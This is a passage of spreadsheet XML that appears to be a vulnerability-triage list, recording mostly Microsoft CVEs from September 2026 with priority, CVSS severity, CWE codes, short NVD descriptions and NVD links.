      <c r="T1009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1010" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73003</t>
        </is>
      </c>
      <c r="D1010" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1010" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1010" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1010" s="5" t="inlineStr"/>
      <c r="H1010" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1010" s="5" t="inlineStr"/>
      <c r="J1010" s="5" t="inlineStr"/>
      <c r="K1010" s="5" t="inlineStr"/>
      <c r="L1010" s="5" t="inlineStr"/>
      <c r="M1010" s="5" t="inlineStr"/>
      <c r="N1010" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1010" s="5" t="inlineStr"/>
      <c r="R1010" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1010" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1011" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73005</t>
        </is>
      </c>
      <c r="D1011" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1011" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1011" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1011" s="5" t="inlineStr"/>
      <c r="H1011" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1011" s="5" t="inlineStr"/>
      <c r="J1011" s="5" t="inlineStr"/>
      <c r="K1011" s="5" t="inlineStr"/>
      <c r="L1011" s="5" t="inlineStr"/>
      <c r="M1011" s="5" t="inlineStr"/>
      <c r="N1011" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1011" s="5" t="inlineStr"/>
      <c r="R1011" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S1011" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1012" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="D1012" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1012" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1012" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1012" s="5" t="inlineStr"/>
      <c r="H1012" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1012" s="5" t="inlineStr"/>
      <c r="J1012" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K101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12" s="5" t="inlineStr"/>
      <c r="M1012" s="5" t="inlineStr"/>
      <c r="N1012" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1012" s="5" t="inlineStr"/>
      <c r="R1012" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1012" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1013" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77485</t>
        </is>
      </c>
      <c r="D1013" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1013" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1013" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1013" s="5" t="inlineStr"/>
      <c r="H1013" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1013" s="5" t="inlineStr"/>
      <c r="J1013" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K1013" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L1013" s="5" t="inlineStr"/>
      <c r="M1013" s="5" t="inlineStr"/>
      <c r="N1013" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q1013" s="5" t="inlineStr"/>
      <c r="R1013" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1013" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1014" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="D1014" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1014" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1014" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1014" s="5" t="inlineStr"/>
      <c r="H1014" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1014" s="5" t="inlineStr"/>
      <c r="J1014" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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14" s="5" t="inlineStr"/>
      <c r="M1014" s="5" t="inlineStr"/>
      <c r="N1014" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1014" s="5" t="inlineStr"/>
      <c r="R1014" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S1014" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1015" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77897</t>
        </is>
      </c>
      <c r="D1015" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1015" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1015" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1015" s="5" t="inlineStr"/>
      <c r="H1015" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1015" s="5" t="inlineStr"/>
      <c r="J1015" s="5" t="inlineStr"/>
      <c r="K1015" s="5" t="inlineStr"/>
      <c r="L1015" s="5" t="inlineStr"/>
      <c r="M1015" s="5" t="inlineStr"/>
      <c r="N1015" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1015" s="5" t="inlineStr"/>
      <c r="R1015" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="S1015" s="5" t="inlineStr">
        <is>
          <t>Relative path traversal in Power Automate allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77897</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1016" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="D1016" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1016" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1016" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1016" s="5" t="inlineStr"/>
      <c r="H1016" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1016" s="5" t="inlineStr"/>
      <c r="J1016" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1016" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t>
        </is>
      </c>
      <c r="L1016" s="5" t="inlineStr"/>
      <c r="M1016" s="5" t="inlineStr"/>
      <c r="N1016" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1016" s="5" t="inlineStr"/>
      <c r="R1016" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1016" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1017" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="D1017" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1017" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1017" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1017" s="5" t="inlineStr"/>
      <c r="H1017" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1017" s="5" t="inlineStr"/>
      <c r="J1017" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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17" s="5" t="inlineStr"/>
      <c r="M1017" s="5" t="inlineStr"/>
      <c r="N1017" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q1017" s="5" t="inlineStr"/>
      <c r="R1017" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1017" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1018" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="D1018" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1018" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1018" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1018" s="5" t="inlineStr"/>
      <c r="H1018" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1018" s="5" t="inlineStr"/>
      <c r="J1018" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1018" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1018" s="5" t="inlineStr"/>
      <c r="M1018" s="5" t="inlineStr"/>
      <c r="N1018" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q1018" s="5" t="inlineStr"/>
      <c r="R1018" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1018" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1019" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78464</t>
        </is>
      </c>
      <c r="D1019" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1019" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1019" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1019" s="5" t="inlineStr"/>
      <c r="H1019" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1019" s="5" t="inlineStr"/>
      <c r="J1019" s="5" t="inlineStr"/>
      <c r="K1019" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L1019" s="5" t="inlineStr"/>
      <c r="M1019" s="5" t="inlineStr"/>
      <c r="N1019" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1019" s="5" t="inlineStr"/>
      <c r="R1019" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S1019" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T1019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78464</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1020" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80093</t>
        </is>
      </c>
      <c r="D1020" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1020" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1020" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1020" s="5" t="inlineStr"/>
      <c r="H1020" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1020" s="5" t="inlineStr"/>
      <c r="J1020" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K102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20" s="5" t="inlineStr"/>
      <c r="M1020" s="5" t="inlineStr"/>
      <c r="N1020" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1020" s="5" t="inlineStr"/>
      <c r="R1020" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1020" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1021" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81192</t>
        </is>
      </c>
      <c r="D1021" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1021" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1021" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1021" s="5" t="inlineStr"/>
      <c r="H1021" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1021" s="5" t="inlineStr"/>
      <c r="J1021" s="5" t="inlineStr"/>
      <c r="K1021" s="5" t="inlineStr"/>
      <c r="L1021" s="5" t="inlineStr"/>
      <c r="M1021" s="5" t="inlineStr"/>
      <c r="N1021" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1021" s="5" t="inlineStr"/>
      <c r="R1021" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S1021"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T1021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1022" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81389</t>
        </is>
      </c>
      <c r="D1022" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1022" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1022" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1022" s="5" t="inlineStr"/>
      <c r="H1022" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1022" s="5" t="inlineStr"/>
      <c r="J1022" s="5" t="inlineStr"/>
      <c r="K1022" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L1022" s="5" t="inlineStr"/>
      <c r="M1022" s="5" t="inlineStr"/>
      <c r="N1022" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1022" s="5" t="inlineStr"/>
      <c r="R1022" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S1022" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T1022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81389</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1023" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="D1023" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1023" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1023" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1023" s="5" t="inlineStr"/>
      <c r="H1023" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1023" s="5" t="inlineStr"/>
      <c r="J1023" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1023" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1023" s="5" t="inlineStr"/>
      <c r="M1023" s="5" t="inlineStr"/>
      <c r="N1023" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1023" s="5" t="inlineStr"/>
      <c r="R1023" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S1023"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T1023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1024" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83940</t>
        </is>
      </c>
      <c r="D1024" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1024" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1024" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1024" s="5" t="inlineStr"/>
      <c r="H1024" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1024" s="5" t="inlineStr"/>
      <c r="J1024" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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4" s="5" t="inlineStr"/>
      <c r="M1024" s="5" t="inlineStr"/>
      <c r="N1024" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1024" s="5" t="inlineStr"/>
      <c r="R1024" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1024" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1025" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="D1025" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1025" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1025" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1025" s="5" t="inlineStr"/>
      <c r="H1025" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1025" s="5" t="inlineStr"/>
      <c r="J1025" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1025" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1025" s="5" t="inlineStr"/>
      <c r="M1025" s="5" t="inlineStr"/>
      <c r="N1025" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q1025" s="5" t="inlineStr"/>
      <c r="R1025" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S1025" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1026" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85360</t>
        </is>
      </c>
      <c r="D1026" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1026" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1026" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1026" s="5" t="inlineStr"/>
      <c r="H1026" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1026" s="5" t="inlineStr"/>
      <c r="J1026" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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26" s="5" t="inlineStr"/>
      <c r="M1026" s="5" t="inlineStr"/>
      <c r="N1026" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1026" s="5" t="inlineStr"/>
